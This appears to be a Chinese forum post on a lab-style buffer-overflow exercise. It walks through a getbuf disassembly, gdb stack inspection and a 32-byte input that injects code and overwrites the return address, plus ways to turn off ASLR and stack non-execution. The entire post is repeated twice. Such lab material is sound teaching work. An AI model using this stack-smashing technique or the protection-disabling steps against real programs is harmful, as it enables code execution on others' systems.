关于缓冲区溢出攻击（buffer overflow）的问题，Ubuntu 环境
2011-11-04 00:29
080484c0 <getbuf>:
80484c0: 55 push %ebp
80484c1: 89 e5 mov %esp,%ebp
80484c3: 8d 45 e8 lea -0x18(%ebp),%eax
80484c6: 83 ec 28 sub $0x28,%esp
80484c9: 89 04 24 mov %eax,(%esp)
80484cc: e8 5f ff ff ff call 8048430 <getxs>
80484d1: 89 ec mov %ebp,%esp
80484d3: b8 01 00 00 00 mov $0x1,%eax
80484d8: 5d pop %ebp
80484d9: c3 ret
80484da: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
080484e0 <test>:
80484e0: 55 push %ebp
80484e1: 89 e5 mov %esp,%ebp
80484e3: 83 ec 08 sub $0x8,%esp
80484e6: c7 04 24 04 86 04 08 movl $0x8048604,(%esp)
80484ed: e8 76 fe ff ff call 8048368 <printf@plt>
80484f2: e8 c9 ff ff ff call 80484c0 <getbuf>
80484f7: 89 44 24 04 mov %eax,0x4(%esp)
80484fb: c7 04 24 15 86 04 08 movl $0x8048615,(%esp)
8048502: e8 61 fe ff ff call 8048368 <printf@plt>
8048507: 89 ec mov %ebp,%esp
8048509: 5d pop %ebp
804850a: c3 ret
804850b: 90 nop
804850c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
在 getbuf 的栈帧内（%ebp+4 处是返回 test 的地址 0x080484f7）用 gdb 查看栈的结果为:
(gdb) x/w $ebp
0xbfffefe8: 0xbfffeff8
(gdb) x/w ($ebp+4)
0xbfffefec: 0x080484f7
(gdb) x/w ($ebp-4)
0xbfffefe4: 0x0028bff4
(gdb) x/w ($ebp-0x18)
0xbfffefd0: 0xbfffeff8
(gdb) x/w ($ebp-24)
0xbfffefd0: 0xbfffeff8
所以输入数据应该为（共 32 字节，小端序）: 前 24 字节填满 buf —— 攻击代码 `mov $0xdeadbeef,%eax; push $0x80484f7; ret`（b8 ef be ad de / 68 f7 84 04 08 / c3）再用 00 补齐；第 25–28 字节覆盖保存的 %ebp，写回原值 0xbfffeff8；第 29–32 字节覆盖返回地址，指向 buf 的起始地址 0xbfffefd0:
b8 ef be ad de 68 f7 84 04 08 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 ef ff bf d0 ef ff bf
把第 21–24 字节（即 %ebp-4 处）改回 gdb 里看到的原值 0x0028bff4 也不行。其实 getxs 返回之后 getbuf 里没有任何指令再读这 4 个字节（只有 mov %ebp,%esp / pop %ebp / ret），改不改都没有影响:
b8 ef be ad de 68 f7 84 04 08 c3 00 00 00 00 00 00 00 00 00 f4 bf 28 00 f8 ef ff bf d0 ef ff bf
攻击代码的地址为 d0 ef ff bf（即 0xbfffefd0，也就是 buf 的起始地址），这是从 <getbuf> 里的这一句得出的:
80484c3: 8d 45 e8 lea -0x18(%ebp),%eax
它把 buf 放在 %ebp-0x18 处，也就是为 buf 留了 24 个字节（之后的 sub $0x28,%esp 再在 buf 下方留出 16 个字节，其中 (%esp) 用来传 buf 地址给 getxs；buf 末尾与保存的 %ebp 之间没有其他空隙，所以第 25 个字节起就覆盖保存的 %ebp，第 29 个字节起覆盖返回地址）。buf 的起始地址可以用下面的命令得到——注意要取的是打印出来的地址 0xbfffefd0，而不是该地址里的内容 0xbfffeff8:
(gdb) x/w ($ebp-24)
0xbfffefd0: 0xbfffeff8
由于为 buf 分配了 24 个字节，所以攻击代码后面用 00 补齐到 24 个字节（前提是 getxs 按十六进制文本读入而不会在 00 处截断，这一点请对照 getxs 的实现确认）。从反汇编看 getbuf 里没有 %gs:0x14 的栈保护（canary）检查，所以不是被 canary 拦下的。更可能的原因是: (1) gdb 默认关闭了地址随机化（ASLR），而且会额外设置 LINES/COLUMNS 等环境变量，所以在 gdb 里看到的 0xbfffefd0 在 gdb 之外不一定还是 buf 的地址——先检查 `cat /proc/sys/kernel/randomize_va_space` 是否为 0，或用 `setarch i386 -R ./程序` 关闭随机化，并尽量让环境变量与 gdb 里一致；(2) 即使地址对了，如果栈被标成不可执行（NX），跳回栈上的攻击代码会直接段错误，需要用 `-z execstack` 重新链接或用 `execstack -s 程序` 打开栈可执行。验证方法是在 gdb 里给 getbuf 的 ret（0x80484d9）下断点，用 si 单步看是否真的跳到了 0xbfffefd0 并执行了 mov $0xdeadbeef,%eax，再 ret 回到 0x80484f7。
我也是在 Ubuntu 下做的，用的 gcc 版本为 3.x（这大概也是反汇编里没有 canary 检查的原因）。
2011-11-04 00:29
080484c0 <getbuf>:
80484c0: 55 push %ebp
80484c1: 89 e5 mov %esp,%ebp
80484c3: 8d 45 e8 lea -0x18(%ebp),%eax
80484c6: 83 ec 28 sub $0x28,%esp
80484c9: 89 04 24 mov %eax,(%esp)
80484cc: e8 5f ff ff ff call 8048430 <getxs>
80484d1: 89 ec mov %ebp,%esp
80484d3: b8 01 00 00 00 mov $0x1,%eax
80484d8: 5d pop %ebp
80484d9: c3 ret
80484da: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
080484e0 <test>:
80484e0: 55 push %ebp
80484e1: 89 e5 mov %esp,%ebp
80484e3: 83 ec 08 sub $0x8,%esp
80484e6: c7 04 24 04 86 04 08 movl $0x8048604,(%esp)
80484ed: e8 76 fe ff ff call 8048368 <printf@plt>
80484f2: e8 c9 ff ff ff call 80484c0 <getbuf>
80484f7: 89 44 24 04 mov %eax,0x4(%esp)
80484fb: c7 04 24 15 86 04 08 movl $0x8048615,(%esp)
8048502: e8 61 fe ff ff call 8048368 <printf@plt>
8048507: 89 ec mov %ebp,%esp
8048509: 5d pop %ebp
804850a: c3 ret
804850b: 90 nop
804850c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
在 getbuf 的栈帧内（%ebp+4 处是返回 test 的地址 0x080484f7）用 gdb 查看栈的结果为:
(gdb) x/w $ebp
0xbfffefe8: 0xbfffeff8
(gdb) x/w ($ebp+4)
0xbfffefec: 0x080484f7
(gdb) x/w ($ebp-4)
0xbfffefe4: 0x0028bff4
(gdb) x/w ($ebp-0x18)
0xbfffefd0: 0xbfffeff8
(gdb) x/w ($ebp-24)
0xbfffefd0: 0xbfffeff8
所以输入数据应该为（共 32 字节，小端序）: 前 24 字节填满 buf —— 攻击代码 `mov $0xdeadbeef,%eax; push $0x80484f7; ret`（b8 ef be ad de / 68 f7 84 04 08 / c3）再用 00 补齐；第 25–28 字节覆盖保存的 %ebp，写回原值 0xbfffeff8；第 29–32 字节覆盖返回地址，指向 buf 的起始地址 0xbfffefd0:
b8 ef be ad de 68 f7 84 04 08 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 ef ff bf d0 ef ff bf
把第 21–24 字节（即 %ebp-4 处）改回 gdb 里看到的原值 0x0028bff4 也不行。其实 getxs 返回之后 getbuf 里没有任何指令再读这 4 个字节（只有 mov %ebp,%esp / pop %ebp / ret），改不改都没有影响:
b8 ef be ad de 68 f7 84 04 08 c3 00 00 00 00 00 00 00 00 00 f4 bf 28 00 f8 ef ff bf d0 ef ff bf
攻击代码的地址为 d0 ef ff bf（即 0xbfffefd0，也就是 buf 的起始地址），这是从 <getbuf> 里的这一句得出的:
80484c3: 8d 45 e8 lea -0x18(%ebp),%eax
它把 buf 放在 %ebp-0x18 处，也就是为 buf 留了 24 个字节（之后的 sub $0x28,%esp 再在 buf 下方留出 16 个字节，其中 (%esp) 用来传 buf 地址给 getxs；buf 末尾与保存的 %ebp 之间没有其他空隙，所以第 25 个字节起就覆盖保存的 %ebp，第 29 个字节起覆盖返回地址）。buf 的起始地址可以用下面的命令得到——注意要取的是打印出来的地址 0xbfffefd0，而不是该地址里的内容 0xbfffeff8:
(gdb) x/w ($ebp-24)
0xbfffefd0: 0xbfffeff8
由于为 buf 分配了 24 个字节，所以攻击代码后面用 00 补齐到 24 个字节（前提是 getxs 按十六进制文本读入而不会在 00 处截断，这一点请对照 getxs 的实现确认）。从反汇编看 getbuf 里没有 %gs:0x14 的栈保护（canary）检查，所以不是被 canary 拦下的。更可能的原因是: (1) gdb 默认关闭了地址随机化（ASLR），而且会额外设置 LINES/COLUMNS 等环境变量，所以在 gdb 里看到的 0xbfffefd0 在 gdb 之外不一定还是 buf 的地址——先检查 `cat /proc/sys/kernel/randomize_va_space` 是否为 0，或用 `setarch i386 -R ./程序` 关闭随机化，并尽量让环境变量与 gdb 里一致；(2) 即使地址对了，如果栈被标成不可执行（NX），跳回栈上的攻击代码会直接段错误，需要用 `-z execstack` 重新链接或用 `execstack -s 程序` 打开栈可执行。验证方法是在 gdb 里给 getbuf 的 ret（0x80484d9）下断点，用 si 单步看是否真的跳到了 0xbfffefd0 并执行了 mov $0xdeadbeef,%eax，再 ret 回到 0x80484f7。
我也是在 Ubuntu 下做的，用的 gcc 版本为 3.x（这大概也是反汇编里没有 canary 检查的原因）。